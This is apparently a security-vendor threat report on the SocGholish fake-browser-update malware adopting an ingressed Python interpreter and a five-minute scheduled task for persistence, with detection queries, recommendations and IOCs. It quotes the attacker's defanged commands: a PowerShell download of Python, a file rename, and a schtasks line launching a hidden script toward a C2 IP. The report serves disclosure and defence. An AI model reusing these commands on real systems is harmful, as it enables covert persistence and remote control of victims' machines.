Using Python for Persistence

In Q1 2024, ReliaQuest detected suspicious JavaScript files in customer environments—including “update.js,” a common file name used by SocGholish and other fake-update malware variants. While reviewing the execution of the first-stage payload, we identified a new behavior for this malware: the ingress of Python for persistence. 

The “SocGholish” malware family (aka “FakeUpdates”) is delivered via drive-by compromise. This type of attack commonly uses a compromised website with high search engine rankings that relies on social engineering to trick users into downloading a malicious JavaScript payload masquerading as a browser update. Upon execution, command-and-control (C2) is established, allowing adversaries to conduct further actions toward their objective.  

ReliaQuest researchers have been tracking the SocGholish malware variant for some time: In Q1 2023, we responded to instances of SocGholish activity leading to the deployment of ransomware 

However, as defenders constantly deploy new security controls to combat threats, attackers adapt their craft in response. The discovery of SocGholish employing Python—instead of Blister Loader—for execution signals an evolution in the tactics, techniques, and procedures of threat actors utilizing this malware.

Infection Chain Steps

After the execution of “update.js” via the Windows utility “wscript.exe,” we observed the following new behaviors. Each command below triggers a series of actions, listed here:

Step One: Ingress

cmd.exe" /C powershell -c "wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;ls c:\programdata\python.zip;Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3;del c:\programdata\python.zip;ls c:\programdata\py3" >> "C:\Users\<username>\AppData\Local\Temp\radBG1A6.tmp"

1. Downloads python3.12.0 as “python.zip” from the official Python Foundation repository, confirms the download, and enumerates the download directory via the “ls” command. 

2. Extracts the contents of python.zip with the command “Expand-Archive –LiteralPath” to the destination path “c:\programdata\py3”. 

3. Deletes the previously downloaded ZIP file, “python[.]zip”. 

4. Lists the contents of “py3” with the command “ls”. 

5. Redirects all of the console output, including errors to the file “ radBG1A6.tmp”. 

Step Two: Execution

cmd.exe" /C rename "c:\programdata\py3\rad39987.tmp" "hklib.py" 

1. Renames the file “rad39987.tmp” to “hklib.py”. The temp file “rad39987.tmp”contains malicious Python code for the following command.  

Step Three: Persistence

C:\Windows\System32\cmd.exe" /C schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5&schtasks /run /tn "pypi-py" >> "C:\Users\<username>\AppData\Local\Temp\radE80E1.tmp 

1. Creates a scheduled task with the name “pypi-py”, overwriting any previously created tasks with the same name.  

2. Executes the Python script “hklib.py” with the ingressed Python interpreter, “pythonw.exe”. This interpreter doesn’t display the console window upon execution like the standard interpreter “python.exe”. This is to keep the malicious task hidden from the user. Based on a similar file found on VirusTotal, we suspect the hklib.py script is a SOCKS5 proxy client being used to establish a C2 connection to the IP and port specified in the command arguments. 

3. The arguments “-ip 92.118.112[.]208 -port 443” are passed as arguments for the executing python script. 

4. The task “pypi-py” is set to execute every 5 minutes and then executed immediately.  

5. The console output, including any errors, is redirected to “radE80E1.tmp”. 

The ingress of Python to establish persistence with a scheduled task (T1053.005) is new for SocGholish. This is likely to improve defense evasion capabilities (TA0005) compared to a traditional loader by utilizing a secondstage download from the trusted domain “python[.]org”.

Unique Behavior Identification 

This is our first observation of SocGholish using Python, so we checked VirusTotal to see whether any samples exist. Based on the results, we are confident that this new behavior has not yet been shared with the security community.  

Query Result
Behavior_command_executions:schtasks /create /f /tn*.py 1 unrelated result.
Behavior_processes:Update.js attack_technique:T1053.005 No results for persistence with scheduled tasks.
filename:update.js content:{707974686f6e} Hex for “python” in an update.js file.
filename:update.js content:{507974686f6e} Hex for “Python” in an update.js file.

What Does This Mean for Organizations? 

This new finding is further evidence of the continued chess game between adversaries and defenders. Defenders are aware of the dangers of commonly known file types, such as malicious executables (.exe) or obfuscated Powershell scripts, but have little prior experience of malicious use of Python. This also means that adversaries are aware of the controls put in place and are implementing granular bypasses. 

Recommendations  

  • Implement a group policy object to set Notepad as the default application for JavaScript files. This will prevent the execution of the initial payload.  
  • Implement application control to prevent applications that are not needed for users’ workflows. Restricting the usage of Powershell, wget, and Python can reduce the chance of successful execution.  
  • Configure Endpoint Detection and Response (EDR systems to not only identify threats but also to actively block them, thereby preventing potential breaches before they can cause harm. 
  • Block JavaScript or VBScript from launching downloaded executable content. Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch other malware from the Internet. 
  • Educate users to download browser updates from only trusted sources.

IOCs

Domains Hashes IPs
oystergardens[dot]club 34b4d749924384409c12988f4c7690751f4b7f7c 92.118.112[.]208